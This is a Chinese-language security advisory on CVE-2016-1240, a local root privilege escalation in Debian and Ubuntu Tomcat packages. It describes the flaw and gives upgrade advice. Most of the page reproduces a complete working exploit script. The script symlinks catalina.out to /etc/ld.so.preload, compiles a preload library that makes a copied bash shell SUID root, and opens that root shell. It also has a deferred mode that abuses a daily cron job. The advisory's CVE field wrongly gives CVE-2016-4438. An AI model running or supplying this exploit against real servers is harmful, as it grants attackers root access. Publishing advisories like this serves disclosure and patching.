Debian Ubuntu Root权限受到威胁 Tomcat本地提权漏洞CVE-2016-1240 请安全运维尽快升级

简介:

2016年9月30日,legalhackers.com网站发布了一个关于Tomcat漏洞的公告,所涉及漏洞的编号为CVE-2016-1240。Debian系统的Linux上管理员通常利用apt-get进行包管理,debian包的一个初始化脚本中存在漏洞,会让deb包安装程序自动执行启动脚本,脚本位置/etc/init.d/tomcatN

攻击者可以在拥有Tomcat低权限的情况下,利用该漏洞获得系统的root权限。受影响的系统包括Debian和ubuntu,其他使用debian包的系统也可能会受影响。

详情请见以下链接:

  • http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
  • https://security-tracker.debian.org/tracker/CVE-2016-1240

漏洞编号

CVE-2016-4438

受影响的版本

受影响的系统包括Debian、Ubuntu,其他使用相应deb包的系统也可能受到影响。受影响的debian包如下:

  • Tomcat 8 <= 8.0.36-2
  • Tomcat 7 <= 7.0.70-2
  • Tomcat 6 <= 6.0.45+dfsg-1~deb8u1

Tomcat是什么

Tomcat是个运行在Apache上的应用服务器,支持运行Servlet/JSP应用程序的容器——可以将Tomcat看作是Apache的扩展,实际上Tomcat也可以独立于Apache运行。

Tomcat是由Apache软件基金会下属的Jakarta项目开发的一个Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer Page(JSP)的支持,并提供了作为Web服务器的一些特有功能,如Tomcat管理和控制平台、安全域管理和Tomcat阀等。由于Tomcat本身也内含了一个HTTP服务器,它也可以被视作一个单独的Web服务器。

Debian是什么

广义的Debian是指一个致力于创建自由操作系统的合作组织及其作品,由于Debian项目众多内核分支中以Linux宏内核为主,而且 Debian开发者 所创建的操作系统中绝大部分基础工具来自于GNU工程 ,因此 “Debian” 常指Debian GNU/Linux。

规避方案

Tomcat安全团队已经修复了受影响的包,建议用户升级到最新版本,新版本下载地址如下:

  • https://sources.debian.net/src/tomcat6/
  • https://sources.debian.net/src/tomcat7/
  • https://sources.debian.net/src/tomcat8/

Tomcat Root提权漏洞简析

本地攻击者,作为tomcat用户(比如说,通过web应用的漏洞)若将catalina.out修改为指向任意系统文件的链接,一旦Tomcat init脚本(ROOT权限运行)在服务重启后再次打开catalina.out文件,攻击者就可获取ROOT权限。

# Run the catalina.sh script as a daemon

set +e

touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

Tomcat Root提权漏洞验证程序

------[ tomcat-rootprivesc-deb.sh ]------

#!/bin/bash 

# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit 

# CVE-2016-1240 

# Discovered and coded by: 

# Dawid Golunski 
# http://legalhackers.com 

# This exploit targets Tomcat (versions 6, 7 and 8) packaging on 
# Debian-based distros including Debian, Ubuntu etc. 
# It allows attackers with a tomcat shell (e.g. obtained remotely through a 
# vulnerable java webapp, or locally via weak permissions on webapps in the 
# Tomcat webroot directories etc.) to escalate their privileges to root. 

# Usage: 
# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred] 

# The exploit can used in two ways: 

# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly 
# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. 
# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up 
# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.) 

# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to 
# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. 
# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a 
# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can 
# then add arbitrary commands to the file which will be executed with root privileges by 
# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default 
# Ubuntu/Debian Tomcat installations). 

# See full advisory for details at: 
# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html 

# Disclaimer: 
# For testing purposes only. Do no harm. 
#

BACKDOORSH="/bin/bash" 
BACKDOORPATH="/tmp/tomcatrootsh" 
PRIVESCLIB="/tmp/privesclib.so" 
PRIVESCSRC="/tmp/privesclib.c" 
SUIDBIN="/usr/bin/sudo"

function cleanexit { 
# Cleanup 
echo -e "\n[+] Cleaning up..." 
rm -f $PRIVESCSRC 
rm -f $PRIVESCLIB 
rm -f $TOMCATLOG 
touch $TOMCATLOG 
if [ -f /etc/ld.so.preload ]; then 
echo -n > /etc/ld.so.preload 2>/dev/null 
fi 
echo -e "\n[+] Job done. Exiting with code $1 \n" 
exit $1 
}

function ctrl_c() { 
echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." 
cleanexit 0 
}

#intro 
echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n" 
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"

# Args 
if [ $# -lt 1 ]; then 
echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n" 
exit 3 
fi 
if [ "$2" = "-deferred" ]; then 
mode="deferred" 
else 
mode="active" 
fi

# Priv check 
echo -e "\n[+] Starting the exploit in [\033[94m$mode\033[0m] mode with the following privileges: \n`id`" 
id | grep -q tomcat 
if [ $? -ne 0 ]; then 
echo -e "\n[!] You need to execute the exploit as tomcat user! Exiting.\n" 
exit 3 
fi

# Set target paths 
TOMCATLOG="$1" 
if [ ! -f $TOMCATLOG ]; then 
echo -e "\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\n" 
exit 3 
fi 
echo -e "\n[+] Target Tomcat log file set to $TOMCATLOG"

# [ Deferred exploitation ]

# Symlink the log file to /etc/default/locale file which gets executed daily on default 
# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am. 
# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been 
# restarted and file owner gets changed. 
if [ "$mode" = "deferred" ]; then 
rm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG 
if [ $? -ne 0 ]; then 
echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink." 
cleanexit 3 
fi 
echo -e  "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`" 
echo -e  "\n[+] The current owner of the file is: \n`ls -l /etc/default/locale`" 
echo -ne "\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot" 
echo -ne "\n    you'll be able to add arbitrary commands to the file which will get executed with root privileges" 
echo -ne "\n    at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\n\n" 
exit 0 
fi

# [ Active exploitation ]

trap ctrl_c INT 
# Compile privesc preload library 
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" 
cat <<_solibeof_>$PRIVESCSRC 
#define _GNU_SOURCE 
#include <stdio.h> 
#include <sys/stat.h> 
#include <unistd.h> 
#include <dlfcn.h> 
uid_t geteuid(void) { 
static uid_t  (*old_geteuid)(); 
old_geteuid = dlsym(RTLD_NEXT, "geteuid"); 
if ( old_geteuid() == 0 ) { 
chown("$BACKDOORPATH", 0, 0); 
chmod("$BACKDOORPATH", 04777); 
unlink("/etc/ld.so.preload"); 

return old_geteuid(); 

_solibeof_ 
gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl 
if [ $? -ne 0 ]; then 
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." 
cleanexit 2; 
fi

# Prepare backdoor shell 
cp $BACKDOORSH $BACKDOORPATH 
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"

# Safety check 
if [ -f /etc/ld.so.preload ]; then 
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." 
cleanexit 2 
fi

# Symlink the log file to ld.so.preload 
rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG 
if [ $? -ne 0 ]; then 
echo -e "\n[!] Couldn't remove the $TOMCATLOG file or create a symlink." 
cleanexit 3 
fi 
echo -e "\n[+] Symlink created at: \n`ls -l $TOMCATLOG`"

# Wait for Tomcat to re-open the logs 
echo -ne "\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart..." 
echo -e  "\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)" 
while :; do 
sleep 0.1 
if [ -f /etc/ld.so.preload ]; then 
echo $PRIVESCLIB > /etc/ld.so.preload 
break; 
fi 
done

# /etc/ld.so.preload file should be owned by tomcat user at this point 
# Inject the privesc.so shared library to escalate privileges 
echo $PRIVESCLIB > /etc/ld.so.preload 
echo -e "\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n`ls -l /etc/ld.so.preload`" 
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" 
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"

# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) 
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" 
sudo --help 2>/dev/null >/dev/null

# Check for the rootshell 
ls -l $BACKDOORPATH | grep rws | grep -q root 
if [ $? -eq 0 ]; then 
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" 
echo -e "\n\033[94mPlease tell me you're seeing this too ;) \033[0m" 
else 
echo -e "\n[!] Failed to get root" 
cleanexit 2 
fi

# Execute the rootshell 
echo -e "\n[+] Executing the rootshell $BACKDOORPATH now! \n" 
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" 
$BACKDOORPATH -p

# Job done. 
cleanexit 0

--------------[ EOF ]-------------------- 

绿盟科技声明

本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告,必须保证此安全公告的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全公告内容,不得以任何方式将其用于商业目的。



原文发布时间:2017年3月24日

本文由:绿盟科技 发布,版权归属于原作者

原文链接:http://toutiao.secjia.com/tomcat-root-privilege-escalation-exploit-cve-2016-1240

本文来自云栖社区合作伙伴安全加,了解相关信息可以关注安全加网站

相关文章
|
28天前
|
Ubuntu 安全 Linux
基于Ubuntu24.04原内核6.8.0升级到6.9.0
通过上述步骤,我们在Ubuntu 24.04系统上成功地将内核从6.8.0升级到了6.9.0。升级内核有助于提高系统的安全性和性能,但也可能带来兼容性问题。因此,在升级前备份重要数据,并确保新内核支持所需的所有硬件和软件。通过合理的验证和测试,可以确保系统在新内核上稳定运行。
64 6
|
2月前
|
并行计算 Ubuntu 算法
Ubuntu18 服务器 更新升级CUDA版本 pyenv nvidia ubuntu1804 原11.2升级到PyTorch要求12.1 全过程详细记录 apt update
Ubuntu18 服务器 更新升级CUDA版本 pyenv nvidia ubuntu1804 原11.2升级到PyTorch要求12.1 全过程详细记录 apt update
130 0
|
4月前
|
Ubuntu Linux 网络安全
在Ubuntu上离线升级OpenSSH
本文介绍了在Ubuntu系统上离线升级OpenSSH的详细步骤,包括移除旧版本、解压新版本、编译安装、解决依赖问题、替换相关命令、重启SSHD服务以及验证升级结果。
667 1
|
4月前
|
运维 Shell Linux
运维专题.Docker功能权限(Capabilities)管理和查看
运维专题.Docker功能权限(Capabilities)管理和查看
152 1
|
5月前
|
分布式计算 运维 DataWorks
MaxCompute操作报错合集之用户已在DataWorks项目中,并有项目的开发和运维权限,下载数据时遇到报错,该如何解决
MaxCompute是阿里云提供的大规模离线数据处理服务,用于大数据分析、挖掘和报表生成等场景。在使用MaxCompute进行数据处理时,可能会遇到各种操作报错。以下是一些常见的MaxCompute操作报错及其可能的原因与解决措施的合集。
|
5月前
|
Ubuntu C语言
Ubuntu升级Cmake、gcc、g++
以上就是在Ubuntu中升级Cmake、gcc、g++的步骤。
274 2
|
7月前
|
运维 Ubuntu 安全
运维最全linux 命令行操作串口_linux串口命令(2),2024年最新Linux运维源码的Binder权限是如何控制
运维最全linux 命令行操作串口_linux串口命令(2),2024年最新Linux运维源码的Binder权限是如何控制
运维最全linux 命令行操作串口_linux串口命令(2),2024年最新Linux运维源码的Binder权限是如何控制
|
7月前
|
Ubuntu 网络协议 Linux
Ubuntu系统升级16.04升级18.04
Ubuntu系统升级16.04升级18.04
392 0
|
7月前
|
并行计算 Ubuntu
Ubuntu16.04升级到18.04--检查更新时出现问题--解决方法
Ubuntu16.04升级到18.04--检查更新时出现问题--解决方法
126 0
|
应用服务中间件
tomcat root dir log 配置
tomcat 配置log记录及root 目录
603 0